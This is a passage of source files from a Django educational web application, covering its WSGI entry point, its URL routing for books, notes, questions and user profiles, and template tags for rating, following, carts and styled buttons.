as_reactor = property(lambda self: self.get_role('reactor'))\n as_mortal = property(lambda self: self.get_role('mortal'))\n as_tactile = property(lambda self: self.get_role('tactile'))\n\n def _get_pos(self):\n return self.x, self.y\n def _set_pos(self, pos):\n self.x, self.y = pos\n pos = property(_get_pos, _set_pos, doc=\n '''Swizzle for (x, y).''')\n\n def select_in_reach(self):\n return interface.ui.select_adjacent_entity()\n \n def get_in_reach(self):\n in_reach = []\n for entity in chain(self.held_entities, [self.get_underfoot()]):\n in_reach.append(entity)\n neighbors = (self.get_adjacent(dx, dy) for dx, dy in DIRECTIONS)\n for entity in neighbors:\n if not entity.walkable:\n in_reach.append(entity)\n return in_reach \n \n def get_underfoot(self):\n '''Return the entity just under this one.'''\n return self.get_adjacent(0, 0, -1)\n\n def get_adjacent(self, dx, dy, dz=None):\n '''Return the entity adjacent to this one in the given x, y, and z\n directions.\n '''\n if dz is None:\n z = -1\n else:\n z = self.z + dz\n return self.plains.get_entity(self.x + dx, self.y + dy, z)\n\n def update(self, nomad):\n '''Update the entity for each of its roles, given a `Nomad`.\n \n A `Role` may provide behavior for this method by overriding\n `Role.update`.\n '''\n for role in self.roles.values():\n if role:\n role.update(nomad)\n\n def put_underfoot(self, entity):\n '''Place an entity just under this one.'''\n if not entity:\n return\n self.plains.add_entity(entity, self.x, self.y, self.z)\n\n def damage(self, dmg):\n damaged = False\n for role in self.roles.values():\n if role:\n damaged = role.damage(dmg) or damaged\n \n def wait(self):\n '''Do nothing.'''\n pass\n\n def move(self, dx, dy):\n '''Move the entity in the given direction.'''\n assert None not in (self.x, self.y, self.plains)\n x = self.x + dx\n y = self.y + dy\n if not self.plains.walkable_at(x, y):\n return\n self.plains.move_entity(self, x, y) \n"
},
{
"alpha_fraction": 0.5177819132804871,
"alphanum_fraction": 0.5233972668647766,
"avg_line_length": 30.895523071289062,
"blob_id": "b48ffbc52001a94b72edf910a19114fd47708330",
"content_id": "04a6f9579296e071873d93a37660f0c88113baa0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4274,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 134,
"path": "/nomad/interface.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "import curses\nfrom curses import KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN\n\nfrom nomad.util import *\n\n# curses color pair numbers (for `init_color_pairs` and `render_info`)\nPAIR_RED = 1\nPAIR_GREEN = 2\nPAIR_YELLOW = 3\nPAIR_BLUE = 4\nPAIR_MAGENTA = 5\nPAIR_CYAN = 6\nPAIR_WHITE = 7\n\nKEY_ENTER = ord(' ')\nKEY_YES = ord('y')\nKEY_NO = ord('n')\n\nui = None\n\nkey_to_dir = flatten_keys({\n (ord('s'),): (0, 0),\n (ord('h'), KEY_LEFT): DIR_LEFT,\n (ord('j'), KEY_DOWN): DIR_DOWN,\n (ord('k'), KEY_UP): DIR_UP,\n (ord('l'), KEY_RIGHT): DIR_RIGHT,\n (ord('y'),): DIR_UPLEFT,\n (ord('u'),): DIR_UPRIGHT,\n (ord('b'),): DIR_DOWNLEFT,\n (ord('n'),): DIR_DOWNRIGHT,})\n\nclass Interface:\n\n def __init__(self, stdscr, plains_win, status_win, nomad, display_dict,\n command_dict):\n self.stdscr = stdscr\n self.plains_win = plains_win\n self.status_win = status_win\n self.nomad = nomad\n self.plains = nomad.plains\n self.display_dict = display_dict\n self.command_dict = command_dict\n\n def select_adjacent_entity(self):\n '''Prompt the player to select an entity adjacent to the nomad.\n\n The player presses the corresponding movement key for the desired\n direction. 's' selects the entity underfoot.\n '''\n # Highlight nomad.\n los = self.nomad.los\n x, y = self.nomad.pos\n self.plains_win.chgat(y + los, x + los, 1, curses.A_REVERSE)\n\n cmd = None\n dx = dy = 0\n while True:\n # Get keyboard input.\n while cmd != KEY_ENTER:\n cmd = self.plains_win.getch()\n if cmd not in key_to_dir:\n continue\n\n self.update_plains_window()\n dx, dy = key_to_dir[cmd]\n self.plains_win.chgat(y + los + dy, x + los + dx, 1,\n curses.A_REVERSE)\n\n if (dx, dy) == (0, 0):\n return self.nomad.get_underfoot()\n else:\n adjacent = self.nomad.get_adjacent(dx, dy)\n if not adjacent.walkable:\n return adjacent\n else:\n return None\n\n \n def update_status_window(self):\n '''Draw some information about a `Nomad` on a window.'''\n self.status_win.clear()\n y = 1\n x = 2\n ystep = 1\n\n self.status_win.addstr(y, x, '---- Nomad -----')\n y += ystep\n\n y += ystep\n self.status_win.addstr(y, x, 'Health: ')\n self.status_win.addstr('{:.0f}'.format(self.nomad.as_mortal.health))\n y += ystep\n self.status_win.addstr(y, x, 'Satiation: ')\n self.status_win.addstr('{:.0f}'.format(self.nomad.as_mortal.satiation))\n y += ystep\n\n y += ystep\n self.status_win.addstr(y, x, 'LH: ')\n self.status_win.addstr(str(self.nomad.as_tactile.held_entities[0]))\n y+= ystep\n self.status_win.addstr(y, x, 'RH: ')\n self.status_win.addstr(str(self.nomad.as_tactile.held_entities[1]))\n\n self.status_win.box()\n self.status_win.refresh()\n\n\n def update_plains_window(self):\n '''Draw a `Plains` on a window, given rendering information.'''\n self.plains_win.clear()\n\n coords = range(self.plains.entities.left,\n self.plains.entities.right + 1)\n # For y, x in the boundary rectangle of the plains\n for y in coords:\n for x in coords:\n # If xy is in the plains, draw the plains at that xy.\n if (x, y) in self.plains.entities:\n entity = self.plains.get_entity(x, y, -1)\n char, color = self.display_dict[entity.name]\n # Otherwise, draw an blank space.\n else:\n char = ' '\n color = PAIR_WHITE\n self.plains_win.addnstr(y + self.plains.entities.down,\n x + self.plains.entities.right,\n char, 1, curses.color_pair(color))\n\n self.plains_win.refresh()\n\n def interact(self):\n key = self.plains_win.getch()\n if key in self.command_dict:\n self.command_dict[key](self.nomad)\n"
},
{
"alpha_fraction": 0.5730336904525757,
"alphanum_fraction": 0.5730336904525757,
"avg_line_length": 16.600000381469727,
"blob_id": "b5d650ef92bd3f9a4572d57fd34bef2c39332322",
"content_id": "42cc5aaacad6ddde57da8fcdbbcf72e28da9f787",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/run.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom nomad import game\n\nif __name__ == '__main__':\n game.run()\n\n"
},
{
"alpha_fraction": 0.704827606678009,
"alphanum_fraction": 0.704827606678009,
"avg_line_length": 37.157894134521484,
"blob_id": "1b2d4f7bdc3ed4bd1ca00b5c13908cd9526e71f7",
"content_id": "a49231d97793d4ec48a67ba1e8d00b4e68b71910",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 19,
"path": "/README.rst",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "Nomad\n=====\nAn open-ended, dynamically generated adventure game\n---------------------------------------------------\n\nIn Nomad you play a wandering nomad on an endless, shifting plains that\nchanges as it leaves your line of sight. There is no goal, but the nomad\nmust keep moving in search of food, water, and a safe place to rest.\n\nThere is no telling what the nomad will encounter on the plains, for\nwhat lies abroad is known to no one. On the plains, nothing is certain\nbut this: all paths are one-way.\n\nDevelopment\n...........\n\nNomad works: you can play it until the nomad dies. But there aren't a\nlot of things to do right now. As Nomad evolves its world will become\nricher and something more akin to a game will appear.\n"
},
{
"alpha_fraction": 0.533923327922821,
"alphanum_fraction": 0.5378564596176147,
"avg_line_length": 29.81818199157715,
"blob_id": "0203fda7b16d71a2e9a53217ad777ebe36507357",
"content_id": "c65a67d7d920aa55b610507b36a5ecb0a3ac0727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 33,
"path": "/nomad/nomad.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "from nomad.entity import Entity, Stats\nfrom nomad.roles import *\nfrom nomad.entities import *\n\n\nclass Nomad(Entity):\n '''The player-controlled entity.'''\n\n object_factory = {\n frozenset(('sharp rock', 'stick')): (3, spear),\n }\n\n def __init__(self, los, stats=Stats(3, 3, 3)):\n '''Initialize the nomad.\n\n :Parameters:\n `los` : int\n How far the nomad sees in any direction. Should be\n equal to the plains' radius, once set.\n '''\n super().__init__('nomad', False, stats, roles=dict(\n mortal=Mortal(),\n tactile=Tactile(self.object_factory)))\n self.los = los\n\n def move(self, dx, dy):\n '''Move the nomad, shifting the plains with it to simulate\n line of sight.\n '''\n if not self.plains.walkable_at(self.x + dx, self.y + dy):\n return\n self.plains.shift(-dx, -dy)\n self.plains.move_entity(self, self.x + dx, self.y + dy)\n"
},
{
"alpha_fraction": 0.5324675440788269,
"alphanum_fraction": 0.5324675440788269,
"avg_line_length": 76,
"blob_id": "27568e65e0ad886087aadb38b44ed7a6fac97849",
"content_id": "996c6d032691b55e898c496b85b661dc3d55b113",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 1,
"path": "/nomad/__init__.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "__all__ = ['entity', 'entities', 'game', 'nomad', 'plains', 'roles', 'util']\n"
}
] | 13 |
DerekBishopp/CSCI156-Activity-15
|
https://github.com/DerekBishopp/CSCI156-Activity-15
|
c3c77ac17ec39900c014376d6e292eb901265235
|
16718279979c5cd0c5ceb02653675773637b1557
|
32e8f4481271021471bc27087419c7c1e0f32f05
|
refs/heads/master
| 2021-01-16T22:19:46.071746 | 2014-11-17T20:02:34 | 2014-11-17T20:02:34 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.721611738204956,
"avg_line_length": 22.60869598388672,
"blob_id": "f456e4f0ae9d82e025e23dce03fb8950a31830ab",
"content_id": "161f2e31c8c56292cf2a7492219780f1e4ed8574",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 23,
"path": "/Activity 15.py",
"repo_name": "DerekBishopp/CSCI156-Activity-15",
"src_encoding": "UTF-8",
"text": "__author__ = 'Derek'\nimport copy\n\nclass Foo():\n \"\"\"Blahh\"\"\"\n notagoodidea = 'what am I now?'\n\nobject1 = Foo()\n\nobject1.x = 'who knows'\n\nobject2 = object1\n\nobject2.notagoodidea = 'whos on first?'\n\nobject3 = copy.copy(object1)\n\nobject3.notagoodidea = 'im lost'\n\nprint('class variable:',Foo.notagoodidea,id(Foo.notagoodidea))\nprint('instance variable 1:',object1.x,id(object1),id(object1.x))\nprint('instance variable:',object2.notagoodidea,id(object2.notagoodidea))\nprint('instance variable:',object3.notagoodidea,id(object3.notagoodidea))\n\n\n\n"
}
] | 1 |
headrun/notemonk
|
https://github.com/headrun/notemonk
|
4e840bba8c44c6f3ab24faa5e1f1d661af6c6d68
|
e9e05cd03149dc58ac14c9aa8bd31ab54f5bcebb
|
0921a93769c6f9c69a140a1f60f26c5037e2e665
|
refs/heads/master
| 2021-12-14T16:53:42.192363 | 2015-05-08T05:23:28 | 2015-05-08T05:23:28 | 33,764,304 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7511312365531921,
"alphanum_fraction": 0.7556561231613159,
"avg_line_length": 30.571428298950195,
"blob_id": "0783a1684baf03dc2c91976fe91b5a7b2a412d45",
"content_id": "be69f98ed83d7a2d59fe3ea54868a626a4d475df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 7,
"path": "/www/django_wsgi.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os, sys\nos.environ['DJANGO_SETTINGS_MODULE'] = 'www.settings'\n\nsys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))\n\nimport django.core.handlers.wsgi\napplication = django.core.handlers.wsgi.WSGIHandler()\n"
},
{
"alpha_fraction": 0.5674558281898499,
"alphanum_fraction": 0.5799824595451355,
"avg_line_length": 50.17647171020508,
"blob_id": "6a194923374720c5207dd45a73a2062aa887db07",
"content_id": "12f2aa300d152c28fff7c916818f8ba54e2a96fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7983,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 153,
"path": "/www/urls.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.conf.urls.defaults import *\r\nfrom django.contrib import admin\r\nfrom django.conf import settings\r\nfrom django.contrib.auth.views import password_reset, password_reset_done\r\nfrom django.contrib.auth.views import password_reset_confirm, password_reset_complete\r\nfrom django.views.decorators.cache import cache_page\r\n\r\n# Pagination url regular expression that extracts\r\n# page_no and num from the url if present\r\nP = '(?:(?P<page_no>[0-9]+)/(?:(?P<num>[0-9]+)/){0,1}){0,1}'\r\n\r\n# Generic Target Url Fragment\r\nT = '(?P<target_type>[0-9]+)/(?P<target>[0-9]+)'\r\n\r\n# Username capture Url Fragment\r\nU = '(?P<username>[:_\\.\\-A-Za-z0-9]+)'\r\n\r\nadmin.autodiscover()\r\n\r\nhandler500 = 'core.views.handler_500'\r\nhandler404 = 'core.views.handler_404'\r\n\r\nurls = patterns('core.views',\r\n url(r'^admin/', include(admin.site.urls)),\r\n\r\n url(r'^ncert/$', 'ncert_view', name='ncert_page'),\r\n url(r'^tamilnadu/$', 'tamilnadu_view', name='tamilnadu_page'),\r\n url(r'^bits_msss/$', 'bits_view', name='bits_page'),\r\n url(r'^anu_books/$', 'anu_view', name='anu_page'),\r\n url(r'^ipe_books/$', 'ipe_view', name='ipe_page'),\r\n url(r'^cbse_books/$', 'cbse_view', name='cbse_page'),\r\n url(r'^aieee_books/$', 'aieee_view', name='aieee_page'),\r\n url(r'^iitjee_books/$', 'iitjee_view', name='iitjee_page'),\r\n url(r'^upsc_books/$', 'upsc_view', name='upsc_page'),\r\n\r\n # background ad popup version page [ bad.html ]\r\n url(r'^bad/$', 'bad_view', name='bad_page'),\r\n\r\n\r\n url(r'^$', 'home_view', name='home_page'),\r\n url(r'', include('social_auth.urls')),\r\n url(r'^login/$', 'login_view', name='login_page'),\r\n url(r'^logout/$', 'logout_user'),\r\n url(r'^fb_login/$', 'fb_login'),\r\n url(r'^accounts/profile/$', 'user_view'),\r\n \r\n url(r'^invite/$', 'invite_view'),\r\n url(r'^email/$', 'email_view', name='email_page'),\r\n\r\n url(r'^tags/$', 'tags_view'),\r\n\r\n url(r'^user/$', 'user_view'),\r\n url(r'^user/edit/$', 'user_edit_view', name='user_edit_page'),\r\n url(r'^user/%s/(?:(?P<a_id>[0-9]+)/){0,1}$' % U, 'user_view', name='user_page'),\r\n url(r'^user/%s/(?P<filter>[a-z_]+)/%s$' % (U, P), 'user_items_view', name='user_items_page'),\r\n \r\n url(r'^books/$', 'books_view', name='books_page'),\r\n url(r'^books/recent/%s$' % P, 'books_recent_view', name='books_recent_page'),\r\n url(r'^books/popular/%s$' % P, 'books_popular_view', name='books_popular_page'),\r\n url(r'^books/tag/(?P<tag>[^/]+)/%s$' % P, 'books_tag_view', name='books_tag_page'),\r\n url(r'^books/tag/all/(?P<tags>.*?)/%s$' % P, 'books_tag_all_view', name='books_tag_all_page'),\r\n url(r'^books/tag/any/(?P<tags>.*?)/%s$' % P, 'books_tag_any_view', name='books_tag_any_page'),\r\n \r\n url(r'^book/add/$', 'book_add_view', name='book_add_page'),\r\n url(r'^book/edit/(?P<book_id>[0-9]+)/$', 'book_edit_view', name='book_edit_page'),\r\n url(r'^book/(?P<book_id>[0-9]+)/', 'book_view', name='book_page'),\r\n url(r'^book/moderators/(?P<book_id>[0-9]+)/%s$' % P, 'book_moderators_view', name='book_moderators_page'),\r\n url(r'^book/request-moderation/(?P<book_id>[0-9]+)/$', 'book_request_moderation_view', name='book_moderation_page'),\r\n url(r'^book/confirm-moderation/(?P<book_id>[0-9]+)/%s/$' % U,\r\n 'book_confirm_moderation_view', name='book_confirm_moderation_page'),\r\n\r\n url(r'^node/(?P<node_id>[0-9]+)/', 'node_view', name='node_page'),\r\n url(r'^video/(?P<avideo_id>[0-9]+)/', 'video_view', name='video_page'),\r\n url(r'^attachment/(?P<attachment_id>[0-9]+)/', 'attachment_view', name='attachment_page'),\r\n url(r'^attachment/edit/(?P<attachment_id>[0-9]+)/', 'attachment_edit_view', name='attachment_edit_page'),\r\n url(r'^attachment/add/%s/$' % T, 'attachment_add_view'),\r\n url(r'^image/(?P<image_id>[0-9]+)/', 'image_view', name='image_page'),\r\n\r\n url(r'^note/(?P<note_id>[0-9]+)/$', 'note_view', name='note_page'),\r\n url(r'^note/(?P<note_id>[0-9]+)/edit/$', 'note_edit_view', name = 'note_edit_page'),\r\n url(r'^note/(?P<note_id>[0-9]+)/revisions/%s$' % P, 'note_edit_view'),\r\n url(r'^note/(?P<note_id>[0-9]+)/revision/(?P<revision_id>[0-9]+)/$', 'note_revision_view', name='note_revision_page'),\r\n url(r'^note/(?P<note_id>[0-9]+)/revision/(?P<revision_id>[0-9]+)/revert/$', 'note_revision_revert_view', name='note_revision_revert_page'),\r\n\r\n url(r'^qa/question/$', 'question'),\r\n url(r'^qa/answer/$', 'answer'),\r\n url(r'^qa/question/(?P<q_id>[0-9]+)/', 'question_view'),\r\n\r\n url(r'^add/video/$', 'add_video'),\r\n url(r'^add/image/$', 'add_image'),\r\n url(r'^add/note/$', 'add_note'),\r\n\r\n url(r'^questions/%s/%s' % (T, P), 'questions_view'),\r\n url(r'^images/%s/%s' % (T, P), 'images_view'),\r\n url(r'^videos/%s/%s' % (T, P), 'videos_view'),\r\n url(r'^attachments/%s/%s' % (T, P), 'attachments_view'),\r\n url(r'^notes/%s/%s' % (T, P), 'notes_view'),\r\n\r\n url(r'^activities/all/(?:(?P<a_id>[0-9]+)/){0,1}$', 'activities_view'),\r\n \r\n url(r'^(?P<u_items>[a-z]+)/all/(?P<order>[a-z]+)/%s$' % P, 'allitems_view'),\r\n \r\n url(r'^up/%s/%s' % (T, P), 'uppers_view'),\r\n url(r'^down/%s/%s' % (T, P), 'downers_view'),\r\n url(r'^followers/%s/%s' % (T, P), 'followers_view'),\r\n\r\n url(r'^users/%s' % P, 'users_view'),\r\n url(r'^insert_image/(?:%s/){0,1}$' % T, 'insert_image_view'),\r\n\r\n url(r'^redeemables/%s$' % P, 'redeemables_view'),\r\n url(r'^redeemable/(?P<item_id>[0-9]+)/', 'redeemable_view'),\r\n url(r'^redemption/(?P<r_id>[0-9]+)/$', 'redemption_view', name='redemption_page'),\r\n url(r'^cart/add/(?P<item_id>[0-9]+)/(?:(?P<num_items>[0-9]+)/){0,1}$', 'cart_add_view'),\r\n url(r'^cart/remove/(?P<item_id>[0-9]+)/$', 'cart_remove_view'),\r\n url(r'^cart/checkout/$', 'cart_checkout_view'),\r\n\r\n url(r'^rate/$', 'rate'),\r\n url(r'^follow/$', 'follow'),\r\n url(r'^flag/$', 'flag'),\r\n\r\n url(r'^comment/add/%s/$' % T, 'comment_add_view'),\r\n url(r'^comment/edit/(?P<comment_id>[0-9]+)/$', 'comment_edit_view'),\r\n\r\n url(r'^profilepost/(?P<profilepost_id>[0-9]+)/$', 'profilepost_view'),\r\n url(r'^profilepost/add/(?P<profile_id>[0-9]+)/$', 'profilepost_add_view'),\r\n url(r'^profilepost/edit/(?P<post_id>[0-9]+)/$', 'profilepost_edit_view'),\r\n \r\n url(r'^privacy_policy/$', 'privacy_policy_view'),\r\n url(r'^feedback/$', 'feedback_view'),\r\n url(r'^feedback/sent/$', 'feedback_sent_view', name='feedback_sent_page'),\r\n \r\n url(r'^xd_receiver\\.htm$', 'xd_receiver_view'),\r\n \r\n )\r\n\r\nurlpatterns = urls + patterns('',\r\n (r'^markitup/', include('markitup.urls')),\r\n (r'^notification/$', 'django.views.generic.simple.redirect_to', {'url': '/user/edit/'}),\r\n (r'^notification/', include('notification.urls')),\r\n (r'^accounts/password/reset/$', password_reset, {'template_name': 'registration/_password_reset.html'}),\r\n (r'^accounts/password/reset/done/$', password_reset_done, {'template_name': 'registration/_password_reset_done.html'}),\r\n (r'^accounts/password/reset/confirm/$', password_reset_confirm, {'template_name': 'registration/_password_reset_confirm.html'}),\r\n (r'^accounts/password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$', password_reset_confirm, {'template_name': 'registration/_password_reset_confirm.html'}),\r\n (r'^accounts/password/reset/complete/$', password_reset_complete, {'template_name': 'registration/_password_reset_complete.html'}),\r\n (r'^accounts/', include('registration.backends.default.urls')),\r\n (r'^favicon\\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/static/images/favicon-32x32.ico'}),\r\n (r'^robots\\.txt$', 'django.views.generic.simple.redirect_to', {'url': '/static/files/robots.txt'}),\r\n (r'^static/(?P<path>.*)$', 'django.views.static.serve',\r\n {'document_root': settings.MEDIA_ROOT}),\r\n (r'^media/(?P<path>.*)$', 'django.views.static.serve',\r\n {'document_root': settings.ADMIN_MEDIA_ROOT}),\r\n (r'^redeem/$', 'django.views.generic.simple.redirect_to', {'url': '/redeemables/'}),\r\n)\r\n"
},
{
"alpha_fraction": 0.5890060067176819,
"alphanum_fraction": 0.5953740477561951,
"avg_line_length": 31.221698760986328,
"blob_id": "170e3f981a6f6d31985a65e8eb4eb53e931a5673",
"content_id": "a87324c44a92546835a521077095a2aef8bfb70e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13662,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 424,
"path": "/www/core/templatetags/tags.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os\nfrom decimal import Decimal\nimport hashlib\nimport colorsys\n\nimport Image as PIL\n\nfrom django import template\nfrom django.db.models.fields.files import FieldFile\nfrom django.template import Library\nfrom django.core.files.base import ContentFile\nfrom django.conf import settings\n\nfrom core.utils import get_doc, HANDLING_CREDITS, parse_flags\nfrom core.models import *\nfrom core.query import get_items_by_tag\n\nNO_IMAGE = '/static/images/no_image_available.gif'\nregister = Library()\n\ndef C(context, c):\n c['request'] = context['request']\n c['user'] = context.get('user', '')\n c['ref_path'] = context.get('ref_path', '')\n return c\n\[email protected]_tag('ui/rate_widget.html', takes_context=True)\ndef rate(context, target):\n user = context['user'] \n \n try:\n rating = target.ratings.get(user=user)\n rating = 'up' if rating.rating == Ratings.UP else 'down'\n except:\n rating = None\n\n return C(context, {'target': target, 'rating': rating})\n\[email protected]_tag('ui/follow_widget.html', takes_context=True)\ndef follow(context, target):\n user = context['user'] \n \n try:\n followed = target.followed_by(user=user)\n except:\n followed = False\n\n return C(context, {'target': target, 'followed': followed})\n\[email protected]_tag('ui/flag_widget.html', takes_context=True)\ndef flag(context, target):\n user = context['user'] \n ref_path = context['ref_path'] \n try:\n flagged = target.flaggers.get(user=user)\n except:\n flagged = False\n\n return C(context, {'target': target, 'flagged': flagged})\n\[email protected]_tag('ui/bookshelf_widget.html', takes_context=True)\ndef bookshelf(context, title, query_type, tags, no_items):\n tags = [t.strip() for t in tags.split(',')]\n books = get_items_by_tag(Book, tags, query_type)\n\n more_link = ''\n if books.count() > no_items:\n tags = '/'.join(tags)\n more_link = '/books/tag/%(query_type)s/%(tags)s/' % locals()\n\n return C(context, {'title': title, 'books': books[:no_items],\n 'more_link': more_link})\n\[email protected]_tag('ui/note_widget.html', takes_context=True)\ndef note(context, target):\n user = context['user']\n user_note = target.user_note(user)\n return C(context, {'user_note': user_note, 'target': target})\n\[email protected]_tag('ui/question_widget.html', takes_context=True)\ndef question(context, target, topic, num):\n markup_widget_id = 'question_text_%d_%d' % (target.ctype.id, target.id)\n return C(context, {'target': target, 'topic': topic, 'num_questions': num,\n 'questions': target.questions.all()[:num],\n 'markup_widget_id': markup_widget_id})\n\[email protected]_tag('ui/profilepost_widget.html', takes_context=True)\ndef profilepost(context, target, topic, num):\n return C(context, {'target': target, 'topic': topic, 'num_posts': num,\n 'posts': target.questions.all()[:num]})\n\[email protected]_tag('ui/bad_script.html', takes_context=True)\ndef background_ad(context, book):\n tags = [t.tag.name for t in book.tags.all()]\n show_ad = False\n\n if 'NCERT' in tags or 'CBSE' in tags or 'Tamil Nadu' in tags:\n if '6th' in tags or '7th' in tags or '8th' in tags or '9th' in tags or '10th' in tags:\n show_ad = False\n\n return C(context, {'show_ad': show_ad, 'tags': tags})\n\[email protected]_tag('ui/comment_widget.html', takes_context=True)\ndef comment(context, target, flags=None):\n flags = parse_flags(flags)\n\n return C(context, {'target': target, 'flags': flags})\n\[email protected]_tag('ui/outline_widget.html', takes_context=True)\ndef outline(context, node, depth):\n subnodes = Node.objects.filter(parent=node).order_by('order')\n return C(context, {'depth': depth + 1, 'node': node, 'subnodes': subnodes})\n\[email protected]_tag('ui/paginator_widget.html', takes_context=True)\ndef paginator(context, items, paging_url):\n previous_link = paging_url.replace('<PAGENO>',\n str(items.previous_page_number()))\n\n next_link = paging_url.replace('<PAGENO>',\n str(items.next_page_number()))\n\n return C(context, {'items': items, 'previous_link': previous_link,\n 'next_link': next_link})\n\[email protected]_tag('ui/preview_widget.html', takes_context=True)\ndef preview_attachment(context, url):\n if url.lower().endswith('xlsx') or url.lower().endswith('doc') or \\\n url.lower().endswith('docx') or url.lower().endswith('pdf'):\n url = ' http://viewer.docspad.com/index.php?doc=%s&key=US3Lx8KlveTOzgYS' %url\n else:\n url = ''\n\n return C(context, {'url':url})\n\[email protected]_tag('ui/cart_widget.html', takes_context=True)\ndef cart(context):\n req = context['request']\n user = context['user']\n if user.is_anonymous():\n return ''\n \n show_checkout_link = not req.get_full_path().startswith('/cart/checkout/')\n \n cart_data = req.session.setdefault('cart', [])\n cart = []\n total_credits = Decimal('0.0')\n\n for item, num in cart_data:\n item = RedeemableItem.objects.get(id=int(item))\n item.opts = range(1, item.num + 1)\n cart.append((item, num))\n item_credits = item.credits * num\n item.item_credits = item_credits\n total_credits += item_credits\n\n total_credits = total_credits + HANDLING_CREDITS\n \n available_credits = user.get_profile().credits - total_credits\n sufficient_credits = (available_credits >= 0)\n\n data = {\n 'cart': cart,\n 'total_credits': total_credits,\n 'available_credits': available_credits.copy_abs(),\n 'handling_credits': HANDLING_CREDITS,\n 'sufficient_credits': sufficient_credits,\n 'checkout_link': show_checkout_link,\n }\n return C(context, data)\n\[email protected]_tag('ui/markitup_editor.html', takes_context=True)\ndef markup(context, widget_id, target):\n return C(context, {'widget_id': widget_id, 'target': target})\n\[email protected]_tag('ui/attachments_widget.html', takes_context=True)\ndef attachments(context, target, num):\n user = context['user']\n can_add = target.is_editable_by(user)\n return C(context, {'target': target, 'num': num, 'can_add': can_add})\n\ndef render(parser, token):\n contents = token.split_contents()\n tag_name = contents.pop(0)\n \n if len(contents) < 1:\n raise template.TemplateSyntaxError, \"%r tag requires atleast one argument\" % tag_name\n\n return RenderObj(contents)\n\nclass RenderObj(template.Node):\n def __init__(self, contents):\n self.contents = contents\n\n def render(self, context):\n resolved_contents = []\n \n for c in self.contents:\n resolved_contents.append(template.Variable(c).resolve(context))\n \n obj = resolved_contents.pop(0)\n if obj is None:\n return ''\n \n return obj.render(context, *resolved_contents)\n\nregister.tag('render', render)\n\ndef button(parser, token):\n args = token.split_contents()\n tag_name = args.pop(0)\n \n if len(args) < 1:\n raise template.TemplateSyntaxError, \"%r tag atleast one argument\" % tag_name\n\n link = args.pop(0)[1:-1]\n kwargs = dict([a.strip('\\'').split('=', 1) for a in args])\n\n nodelist = parser.parse(('endbutton',))\n parser.delete_first_token()\n\n return Button(nodelist, link, kwargs)\n\nclass Button(template.Node):\n DEFAULTS = {\n 'title': 'Click Here',\n 'color': '7E9BDE',\n 'hcolor': 'DEDEDE',\n 'borderwidth': '1px',\n }\n\n def _ensure_range(self, val, min, max):\n if val < min: return min\n if val > max: return max\n return val\n\n def _get_text_color(self, color):\n rgb = self._htmlcolor_to_rgb(color)\n rgb = self._norm_rgb(rgb)\n h, s, v = colorsys.rgb_to_hsv(*rgb)\n\n text_v = .9 if v < .7 else .1\n text_v = self._ensure_range(text_v, 0, 1)\n \n rgb = colorsys.hsv_to_rgb(h, 0.2, text_v)\n rgb = self._denorm_rgb(rgb)\n return self._rgb_to_htmlcolor(rgb)\n\n def _norm_rgb(self, rgb):\n r, g, b = rgb\n r = r / 255.\n g = g / 255.\n b = b / 255.\n return r, g, b\n\n def _denorm_rgb(self, rgb):\n r, g, b = rgb\n r = r * 255\n g = g * 255\n b = b * 255\n return r, g, b\n\n def _get_lighter_color(self, htmlcolor, percent=.1):\n rgb = self._htmlcolor_to_rgb(htmlcolor)\n rgb = self._norm_rgb(rgb)\n h, s, v = colorsys.rgb_to_hsv(*rgb)\n v = v + v * percent\n rgb = colorsys.hsv_to_rgb(h, s, v)\n rgb = self._denorm_rgb(rgb)\n return self._rgb_to_htmlcolor(rgb)\n\n def _get_darker_color(self, htmlcolor, percent=.1):\n rgb = self._htmlcolor_to_rgb(htmlcolor)\n rgb = self._norm_rgb(rgb)\n h, s, v = colorsys.rgb_to_hsv(*rgb)\n v = v - v * percent\n rgb = colorsys.hsv_to_rgb(h, s, v)\n rgb = self._denorm_rgb(rgb)\n return self._rgb_to_htmlcolor(rgb)\n\n def _rgb_to_htmlcolor(self, rgb):\n r, g, b = [int(self._ensure_range(v, 0, 255)) for v in rgb]\n return '%s%s%s' % (hex(r)[2:], hex(g)[2:], hex(b)[2:])\n\n def 